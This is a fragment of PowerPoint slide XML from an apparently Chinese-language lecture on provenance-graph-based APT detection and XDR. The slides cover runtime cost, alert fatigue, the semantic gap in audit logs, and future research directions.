            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Alarm number,10/host/day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>number of nodes, 100~300</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="矩形 57"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7366635" y="3789680"/>
            <a:ext cx="2277110" cy="649605"/>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200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Q 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语义鸿沟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>low-level provenance graph to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>high-level activities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="下箭头 58"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4372610" y="3360420"/>
            <a:ext cx="169545" cy="41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4" name="下箭头 63"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5815965" y="3360420"/>
            <a:ext cx="159385" cy="4292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5" name="下箭头 64"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20220000">
            <a:off x="7223760" y="3420745"/>
            <a:ext cx="178435" cy="3943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7" name="流程图: 可选过程 66"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31750" y="4713605"/>
            <a:ext cx="4480560" cy="1896110"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>现有基于图的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>检测工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>runtime cost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>远大于工业界预期值，是大规模应用的主要障碍。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>现有方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>中最主要的成本在于计算和网络传输成本；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>计算成本随着数据图的增加而增加；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4.90%+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>检测调查无关的良性日志被送到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，产生大量网络传输成本；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Future study directions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>采集过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>分布式计算框架</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="流程图: 可选过程 67"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4646295" y="4695190"/>
            <a:ext cx="3575685" cy="1905635"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">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200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>告警疲劳主要由两个方面衡量（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）告警数量；（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）每个告警子图中节点数量；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>现有方法均远超期望值，存在较严重的告警疲劳问题；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Future study directions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>告警聚合，关联，消减；</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="流程图: 可选过程 72"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8276590" y="4709795"/>
            <a:ext cx="3481070" cy="1899920"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700"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200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. mapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>low-level system audit logs to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>high-level activity and attack semantics </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>不是必须的，安全分析人员根据经验，可以很好的研判结果。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>现有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>方法是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>rule based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的准确率和召回率还存在一定的差距；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Future study directions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可以尝试大模型技术来理解语义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1305F9F-7DA7-46AD-B81D-F422814C27E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 扩展检测和响应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XDR</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697902-F8DA-4037-89E2-F329B0A6C7D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>谢谢观看</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9E16322-89A2-4855-B3A1-5A50D63C62B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546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cce33f4-4970-455a-9877-1ddd2de65308}"/>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rgbClr val="2F5496"/>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35417</TotalTime>
  <Words>14958</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>1639</Paragraphs>
  <Slides>98</Slides>
  <Notes>97</Notes>
  <HiddenSlides>9</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11" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>方正正大黑简体</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
